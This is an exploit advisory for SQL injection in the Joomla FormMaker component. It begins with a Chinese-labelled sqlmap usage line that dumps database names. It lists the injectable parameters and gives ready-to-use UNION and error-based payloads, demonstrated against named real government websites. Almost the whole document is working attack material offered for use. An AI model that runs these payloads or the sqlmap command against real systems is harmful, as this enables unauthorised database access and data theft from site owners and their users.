使用说明:

python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs 
######################################################################
# Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
# Google Dork: Y0ur Brain
# Date: 28.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://extensions.joomla.org/extension/form-maker
# Tested on: Windows
######################################################################

# Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
#           index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}

# ~ Demo ~ # $>

# Example :
# Type: MySQL UNION query (NULL) - with 28 columns
# URI: http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45

# Other Example :
# Type: error-based
# URI: http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1 AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837

# sh00t5 To SQL_master :D